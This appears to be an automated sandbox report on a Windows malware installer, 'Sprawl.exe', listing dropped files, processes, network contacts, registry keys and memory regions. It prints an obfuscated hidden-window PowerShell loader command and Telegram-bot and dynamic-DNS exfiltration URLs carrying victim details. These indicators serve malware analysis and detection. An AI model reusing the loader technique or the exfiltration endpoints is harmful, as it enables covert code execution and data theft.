Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
Sprawl.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
||
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Agog\Smriti\Sprawl.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
||
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Agog\Smriti\Sprawl.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej
|
ASCII text, with very long lines (3041), with CRLF, LF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_30wvgj0h.wbn.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cwgsrsy0.q5t.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f23y1j4c.yt0.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_itlgu4z0.y4p.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mhi4ov11.xlu.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pv0eukwh.l1v.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uwr55imd.0rq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wl5iocnr.qtb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Agog\Smriti\unnamed.jpg
|
JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x512, components
3
|
dropped
|
||
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Agog\psychograph.rut
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Agog\strudsfjerenes.uns
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Overtrdelser.Dok
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\aktivitetsrunde.txt
|
ASCII text, with very long lines (360), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\discourteously.gam
|
GTA audio index data (SDT)
|
dropped
|
There are 9 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\Sprawl.exe
|
"C:\Users\user\Desktop\Sprawl.exe"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"
|
||
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\SysWOW64\msiexec.exe"
|
||
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\SysWOW64\msiexec.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://reallyfreegeoip.org/xml/173.254.250.76$
|
unknown
|
||
https://duckduckgo.com/chrome_newtab
|
unknown
|
||
https://duckduckgo.com/ac/?q=
|
unknown
|
||
https://api.telegram.org
|
unknown
|
||
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2023/10/2024%20/%2001:23:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
|
149.154.167.220
|
||
https://api.telegram.org/bot
|
unknown
|
||
http://crl.microsoft
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://www.office.com/lB
|
unknown
|
||
https://reallyfreegeoip.org/xml/173.254.250.76
|
188.114.97.3
|
||
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
|
unknown
|
||
http://smtp.ionos.es
|
unknown
|
||
https://chrome.google.com/webstore?hl=en
|
unknown
|
||
http://varders.kozow.com:8081
|
unknown
|
||
https://drive.go
|
unknown
|
||
https://www.google.com
|
unknown
|
||
http://checkip.dyndns.org/
|
193.122.6.168
|
||
https://aka.ms/pscore6lB
|
unknown
|
||
https://drive.google.com/
|
unknown
|
||
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://chrome.google.com/webstore?hl=enlB
|
unknown
|
||
https://apis.google.com
|
unknown
|
||
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20a
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://reallyfreegeoip.org/xml/
|
unknown
|
||
https://www.office.com/
|
unknown
|
||
http://checkip.dyndns.org/C7T
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2023/10/2024%20/%2001:23:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
|
149.154.167.220
|
||
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
|
unknown
|
||
https://drive.usercontent.google.com/
|
unknown
|
||
http://checkip.dyndns.org
|
unknown
|
||
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
https://api.telegram.org/bot/sendMessage?chat_id=&text=
|
unknown
|
||
https://www.ecosia.org/newtab/
|
unknown
|
||
https://chrome.google.com/webstore?hl=en8
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://drive.usercontent.google.com/U
|
unknown
|
||
http://aborters.duckdns.org:8081
|
unknown
|
||
https://ac.ecosia.org/autocomplete?q=
|
unknown
|
||
https://www.office.com/8
|
unknown
|
||
http://nsis.sf.net/NSIS_Error
|
unknown
|
||
http://51.38.247.67:8081/_send_.php?L
|
unknown
|
||
http://anotherarmy.dns.army:8081
|
unknown
|
||
https://reallyfreegeoip.org
|
unknown
|
||
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
|
unknown
|
There are 42 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
reallyfreegeoip.org
|
188.114.97.3
|
||
smtp.ionos.es
|
213.165.67.102
|
||
api.telegram.org
|
149.154.167.220
|
||
checkip.dyndns.org
|
unknown
|
||
drive.google.com
|
142.250.184.238
|
||
drive.usercontent.google.com
|
142.250.185.65
|
||
checkip.dyndns.com
|
193.122.6.168
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
||
213.165.67.102
|
smtp.ionos.es
|
Germany
|
||
188.114.97.3
|
reallyfreegeoip.org
|
European Union
|
||
193.122.6.168
|
checkip.dyndns.com
|
United States
|
||
142.250.184.238
|
drive.google.com
|
United States
|
||
142.250.185.65
|
drive.usercontent.google.com
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
21DF1000
|
trusted library allocation
|
page read and write
|
||
5B30000
|
remote allocation
|
page execute and read and write
|
||
B95D000
|
direct allocation
|
page execute and read and write
|
||
6390000
|
remote allocation
|
page execute and read and write
|
||
22911000
|
trusted library allocation
|
page read and write
|
||
B78B000
|
direct allocation
|
page execute and read and write
|
||
B4B4000
|
direct allocation
|
page execute and read and write
|
||
2E6E000
|
stack
|
page read and write
|
||
24A90000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
B9FB000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
24F7E000
|
stack
|
page read and write
|
||
AF21000
|
direct allocation
|
page execute and read and write
|
||
322C000
|
heap
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
22BB6000
|
trusted library allocation
|
page read and write
|
||
22B80000
|
trusted library allocation
|
page read and write
|
||
65F1000
|
heap
|
page read and write
|
||
2F9D000
|
trusted library allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
AE06000
|
direct allocation
|
page execute and read and write
|
||
AF29000
|
direct allocation
|
page execute and read and write
|
||
B0F5000
|
direct allocation
|
page execute and read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
BAEE000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
B614000
|
direct allocation
|
page execute and read and write
|
||
AFB7000
|
direct allocation
|
page execute and read and write
|
||
B054000
|
direct allocation
|
page execute and read and write
|
||
C39000
|
stack
|
page read and write
|
||
24AA0000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
B6CB000
|
direct allocation
|
page execute and read and write
|
||
BE05000
|
direct allocation
|
page execute and read and write
|
||
B4D2000
|
direct allocation
|
page execute and read and write
|
||
BC3E000
|
direct allocation
|
page execute and read and write
|
||
21E63000
|
trusted library allocation
|
page read and write
|
||
BE6C000
|
direct allocation
|
page execute and read and write
|
||
22737000
|
stack
|
page read and write
|
||
B82B000
|
direct allocation
|
page execute and read and write
|
||
AF62000
|
direct allocation
|
page execute and read and write
|
||
AB90000
|
direct allocation
|
page execute and read and write
|
||
23C06000
|
trusted library allocation
|
page read and write
|
||
75C2000
|
heap
|
page read and write
|
||
BBF4000
|
direct allocation
|
page execute and read and write
|
||
8567000
|
heap
|
page read and write
|
||
22AA6000
|
trusted library allocation
|
page read and write
|
||
BB45000
|
direct allocation
|
page execute and read and write
|
||
B896000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
B95A000
|
direct allocation
|
page execute and read and write
|
||
BA21000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
B660000
|
direct allocation
|
page execute and read and write
|
||
BD16000
|
direct allocation
|
page execute and read and write
|
||
BC3A000
|
direct allocation
|
page execute and read and write
|
||
51BD000
|
stack
|
page read and write
|
||
B0F4000
|
direct allocation
|
page execute and read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
24991000
|
heap
|
page read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
4E99000
|
heap
|
page read and write
|
||
22EA1000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
BA09000
|
direct allocation
|
page execute and read and write
|
||
B8CD000
|
direct allocation
|
page execute and read and write
|
||
8A04000
|
heap
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
B209000
|
direct allocation
|
page execute and read and write
|
||
5F08000
|
trusted library allocation
|
page read and write
|
||
2EB0000
|
heap
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
BCBD000
|
direct allocation
|
page execute and read and write
|
||
BB15000
|
direct allocation
|
page execute and read and write
|
||
B345000
|
direct allocation
|
page execute and read and write
|
||
B409000
|
direct allocation
|
page execute and read and write
|
||
230A2000
|
trusted library allocation
|
page read and write
|
||
B155000
|
direct allocation
|
page execute and read and write
|
||
B9D5000
|
direct allocation
|
page execute and read and write
|
||
B611000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
ADEC000
|
direct allocation
|
page execute and read and write
|
||
7553000
|
heap
|
page read and write
|
||
22C95000
|
trusted library allocation
|
page read and write
|
||
B0D3000
|
direct allocation
|
page execute and read and write
|
||
8830000
|
trusted library allocation
|
page read and write
|
||
256E0000
|
trusted library allocation
|
page read and write
|
||
22055000
|
trusted library allocation
|
page read and write
|
||
322E000
|
stack
|
page read and write
|
||
34A0000
|
heap
|
page read and write
|
||
2279000
|
heap
|
page read and write
|
||
5B0000
|
heap
|
page execute and read and write
|
||
B8BB000
|
direct allocation
|
page execute and read and write
|
||
B5E8000
|
direct allocation
|
page execute and read and write
|
||
BE72000
|
direct allocation
|
page execute and read and write
|
||
B5FA000
|
direct allocation
|
page execute and read and write
|
||
BD9C000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
AFB9000
|
direct allocation
|
page execute and read and write
|
||
B0FE000
|
direct allocation
|
page execute and read and write
|
||
B39D000
|
direct allocation
|
page execute and read and write
|
||
620000
|
heap
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
AC4B000
|
direct allocation
|
page execute and read and write
|
||
20F0000
|
heap
|
page read and write
|
||
240A0000
|
trusted library allocation
|
page read and write
|
||
BCB9000
|
direct allocation
|
page execute and read and write
|
||
B826000
|
direct allocation
|
page execute and read and write
|
||
4C0000
|
heap
|
page read and write
|
||
22A9B000
|
trusted library allocation
|
page read and write
|
||
24C6F000
|
stack
|
page read and write
|
||
ADE0000
|
direct allocation
|
page execute and read and write
|
||
B382000
|
direct allocation
|
page execute and read and write
|
||
22AC4000
|
trusted library allocation
|
page read and write
|
||
B203000
|
direct allocation
|
page execute and read and write
|
||
B41B000
|
direct allocation
|
page execute and read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
5B4D000
|
trusted library allocation
|
page read and write
|
||
AAF8000
|
direct allocation
|
page execute and read and write
|
||
B803000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
3424000
|
trusted library allocation
|
page read and write
|
||
B50E000
|
direct allocation
|
page execute and read and write
|
||
21EAC000
|
trusted library allocation
|
page read and write
|
||
22ACC000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
7050000
|
direct allocation
|
page read and write
|
||
24D92000
|
trusted library allocation
|
page read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
2EFE000
|
stack
|
page read and write
|
||
AF48000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
82F4000
|
stack
|
page read and write
|
||
24D30000
|
trusted library allocation
|
page read and write
|
||
AB93000
|
direct allocation
|
page execute and read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
21DC0000
|
trusted library allocation
|
page read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
B182000
|
direct allocation
|
page execute and read and write
|
||
A98C000
|
direct allocation
|
page execute and read and write
|
||
A85F000
|
direct allocation
|
page execute and read and write
|
||
B900000
|
direct allocation
|
page execute and read and write
|
||
23ED4000
|
trusted library allocation
|
page read and write
|
||
8951000
|
heap
|
page read and write
|
||
B7BF000
|
direct allocation
|
page execute and read and write
|
||
BE65000
|
direct allocation
|
page execute and read and write
|
||
25780000
|
trusted library allocation
|
page read and write
|
||
B07D000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
B5C1000
|
direct allocation
|
page execute and read and write
|
||
AE18000
|
direct allocation
|
page execute and read and write
|
||
AB16000
|
direct allocation
|
page execute and read and write
|
||
B24C000
|
direct allocation
|
page execute and read and write
|
||
ACAA000
|
direct allocation
|
page execute and read and write
|
||
B1B0000
|
direct allocation
|
page execute and read and write
|
||
6393000
|
trusted library allocation
|
page read and write
|
||
BFEE000
|
direct allocation
|
page execute and read and write
|
||
3238000
|
heap
|
page read and write
|
||
24F2E000
|
stack
|
page read and write
|
||
2460000
|
heap
|
page read and write
|
||
24B70000
|
trusted library allocation
|
page read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
B2CE000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
B323000
|
direct allocation
|
page execute and read and write
|
||
73D0000
|
direct allocation
|
page read and write
|
||
AFB3000
|
direct allocation
|
page execute and read and write
|
||
BD82000
|
direct allocation
|
page execute and read and write
|
||
7527000
|
heap
|
page read and write
|
||
B7F2000
|
direct allocation
|
page execute and read and write
|
||
AE65000
|
direct allocation
|
page execute and read and write
|
||
B1B9000
|
direct allocation
|
page execute and read and write
|
||
256E0000
|
trusted library allocation
|
page read and write
|
||
BADA000
|
direct allocation
|
page execute and read and write
|
||
8C20000
|
trusted library allocation
|
page read and write
|
||
BAB4000
|
direct allocation
|
page execute and read and write
|
||
AE2D000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
4DD0000
|
heap
|
page execute and read and write
|
||
BFF2000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
6E30000
|
direct allocation
|
page read and write
|
||
23F30000
|
trusted library allocation
|
page read and write
|
||
B74F000
|
direct allocation
|
page execute and read and write
|
||
B466000
|
direct allocation
|
page execute and read and write
|
||
BB23000
|
direct allocation
|
page execute and read and write
|
||
B7B2000
|
direct allocation
|
page execute and read and write
|
||
B295000
|
direct allocation
|
page execute and read and write
|
||
21ACF000
|
stack
|
page read and write
|
||
B100000
|
direct allocation
|
page execute and read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
452000
|
unkown
|
page readonly
|
||
AD93000
|
direct allocation
|
page execute and read and write
|
||
B5DA000
|
direct allocation
|
page execute and read and write
|
||
A7F4000
|
direct allocation
|
page execute and read and write
|
||
AE0A000
|
direct allocation
|
page execute and read and write
|
||
B80A000
|
direct allocation
|
page execute and read and write
|
||
BAAB000
|
direct allocation
|
page execute and read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
25780000
|
trusted library allocation
|
page read and write
|
||
6400000
|
direct allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
BA71000
|
direct allocation
|
page execute and read and write
|
||
7567000
|
heap
|
page read and write
|
||
B601000
|
direct allocation
|
page execute and read and write
|
||
AC33000
|
direct allocation
|
page execute and read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
B1BA000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
25780000
|
trusted library allocation
|
page read and write
|
||
B7AE000
|
direct allocation
|
page execute and read and write
|
||
BBAF000
|
direct allocation
|
page execute and read and write
|
||
78E5000
|
heap
|
page read and write
|
||
BA2E000
|
direct allocation
|
page execute and read and write
|
||
ADAE000
|
direct allocation
|
page execute and read and write
|
||
24A90000
|
trusted library allocation
|
page read and write
|
||
8A21000
|
heap
|
page read and write
|
||
23F30000
|
trusted library allocation
|
page read and write
|
||
23FB0000
|
trusted library allocation
|
page read and write
|
||
7720000
|
heap
|
page read and write
|
||
229B0000
|
trusted library allocation
|
page read and write
|
||
BA5F000
|
direct allocation
|
page execute and read and write
|
||
24670000
|
trusted library allocation
|
page read and write
|
||
BD30000
|
direct allocation
|
page execute and read and write
|
||
AF7D000
|
direct allocation
|
page execute and read and write
|
||
771E000
|
stack
|
page read and write
|
||
B388000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
B2E8000
|
direct allocation
|
page execute and read and write
|
||
B623000
|
direct allocation
|
page execute and read and write
|
||
22091000
|
trusted library allocation
|
page read and write
|
||
2205F000
|
trusted library allocation
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
23F40000
|
trusted library allocation
|
page read and write
|
||
2F30000
|
trusted library section
|
page read and write
|
||
B732000
|
direct allocation
|
page execute and read and write
|
||
4E1E000
|
stack
|
page read and write
|
||
228B0000
|
trusted library allocation
|
page read and write
|
||
BA5C000
|
direct allocation
|
page execute and read and write
|
||
8565000
|
heap
|
page read and write
|
||
23F30000
|
trusted library allocation
|
page read and write
|
||
BB99000
|
direct allocation
|
page execute and read and write
|
||
7B9E000
|
stack
|
page read and write
|
||
BC5C000
|
direct allocation
|
page execute and read and write
|
||
BA9C000
|
direct allocation
|
page execute and read and write
|
||
AE96000
|
direct allocation
|
page execute and read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
745F000
|
stack
|
page read and write
|
||
24EB1000
|
trusted library allocation
|
page read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
ABF9000
|
direct allocation
|
page execute and read and write
|
||
6399000
|
trusted library allocation
|
page read and write
|
||
21BB0000
|
remote allocation
|
page read and write
|
||
B771000
|
direct allocation
|
page execute and read and write
|
||
BC92000
|
direct allocation
|
page execute and read and write
|
||
BFA9000
|
direct allocation
|
page execute and read and write
|
||
ABC6000
|
direct allocation
|
page execute and read and write
|
||
BEB8000
|
direct allocation
|
page execute and read and write
|
||
25700000
|
trusted library allocation
|
page read and write
|
||
23F30000
|
trusted library allocation
|
page read and write
|
||
AF90000
|
direct allocation
|
page execute and read and write
|
||
B5F4000
|
direct allocation
|
page execute and read and write
|
||
ADE6000
|
direct allocation
|
page execute and read and write
|
||
73A0000
|
direct allocation
|
page read and write
|
||
89FA000
|
heap
|
page read and write
|
||
B3C6000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
BF4B000
|
direct allocation
|
page execute and read and write
|
||
B291000
|
direct allocation
|
page execute and read and write
|
||
B848000
|
direct allocation
|
page execute and read and write
|
||
23BB9000
|
trusted library allocation
|
page read and write
|
||
BE74000
|
direct allocation
|
page execute and read and write
|
||
8AA2000
|
heap
|
page read and write
|
||
4D30000
|
trusted library allocation
|
page read and write
|
||
AA34000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
24A90000
|
trusted library allocation
|
page read and write
|
||
B69B000
|
direct allocation
|
page execute and read and write
|
||
B9BE000
|
direct allocation
|
page execute and read and write
|
||
5A28000
|
trusted library allocation
|
page read and write
|
||
B8A7000
|
direct allocation
|
page execute and read and write
|
||
B079000
|
direct allocation
|
page execute and read and write
|
||
A78F000
|
direct allocation
|
page execute and read and write
|
||
B411000
|
direct allocation
|
page execute and read and write
|
||
22FC5000
|
trusted library allocation
|
page read and write
|
||
B7A6000
|
direct allocation
|
page execute and read and write
|
||
AEBF000
|
direct allocation
|
page execute and read and write
|
||
BB9D000
|
direct allocation
|
page execute and read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
256B0000
|
trusted library allocation
|
page read and write
|
||
B371000
|
direct allocation
|
page execute and read and write
|
||
8CC0000
|
trusted library allocation
|
page execute and read and write
|
||
B122000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
ADA2000
|
direct allocation
|
page execute and read and write
|
||
BCF2000
|
direct allocation
|
page execute and read and write
|
||
C021000
|
direct allocation
|
page execute and read and write
|
||
BEBA000
|
direct allocation
|
page execute and read and write
|
||
BB65000
|
direct allocation
|
page execute and read and write
|
||
A974000
|
direct allocation
|
page execute and read and write
|
||
7B1E000
|
stack
|
page read and write
|
||
B973000
|
direct allocation
|
page execute and read and write
|
||
B697000
|
direct allocation
|
page execute and read and write
|
||
B7CB000
|
direct allocation
|
page execute and read and write
|
||
6F90000
|
direct allocation
|
page read and write
|
||
24C80000
|
trusted library allocation
|
page read and write
|
||
BDBD000
|
direct allocation
|
page execute and read and write
|
||
BC85000
|
direct allocation
|
page execute and read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
23C01000
|
trusted library allocation
|
page read and write
|
||
B034000
|
direct allocation
|
page execute and read and write
|
||
21FE1000
|
trusted library allocation
|
page read and write
|
||
B6C3000
|
direct allocation
|
page execute and read and write
|
||
B72F000
|
direct allocation
|
page execute and read and write
|
||
ADAC000
|
direct allocation
|
page execute and read and write
|
||
BB97000
|
direct allocation
|
page execute and read and write
|
||
507C000
|
stack
|
page read and write
|
||
B5A7000
|
direct allocation
|
page execute and read and write
|
||
B645000
|
direct allocation
|
page execute and read and write
|
||
342D000
|
trusted library allocation
|
page execute and read and write
|
||
8680000
|
trusted library allocation
|
page read and write
|
||
B892000
|
direct allocation
|
page execute and read and write
|
||
B07D000
|
direct allocation
|
page execute and read and write
|
||
AF77000
|
direct allocation
|
page execute and read and write
|
||
AF2D000
|
direct allocation
|
page execute and read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
BBAA000
|
direct allocation
|
page execute and read and write
|
||
B756000
|
direct allocation
|
page execute and read and write
|
||
B2FA000
|
direct allocation
|
page execute and read and write
|
||
B415000
|
direct allocation
|
page execute and read and write
|
||
B3BC000
|
direct allocation
|
page execute and read and write
|
||
2392B000
|
trusted library allocation
|
page read and write
|
||
240B0000
|
trusted library allocation
|
page read and write
|
||
AEB8000
|
direct allocation
|
page execute and read and write
|
||
AD6D000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
B559000
|
direct allocation
|
page execute and read and write
|
||
A8A5000
|
direct allocation
|
page execute and read and write
|
||
24EB0000
|
trusted library allocation
|
page read and write
|
||
25060000
|
trusted library allocation
|
page read and write
|
||
B227000
|
direct allocation
|
page execute and read and write
|
||
BC3C000
|
direct allocation
|
page execute and read and write
|
||
BB9B000
|
direct allocation
|
page execute and read and write
|
||
21E90000
|
trusted library allocation
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
30A3000
|
heap
|
page read and write
|
||
AE9C000
|
direct allocation
|
page execute and read and write
|
||
AEB6000
|
direct allocation
|
page execute and read and write
|
||
226EB000
|
stack
|
page read and write
|
||
23FA0000
|
trusted library allocation
|
page read and write
|
||
21DD6000
|
trusted library allocation
|
page read and write
|
||
21E8C000
|
trusted library allocation
|
page read and write
|
||
22FB2000
|
trusted library allocation
|
page read and write
|
||
21CE0000
|
trusted library allocation
|
page execute and read and write
|
||
77BE000
|
stack
|
page read and write
|
||
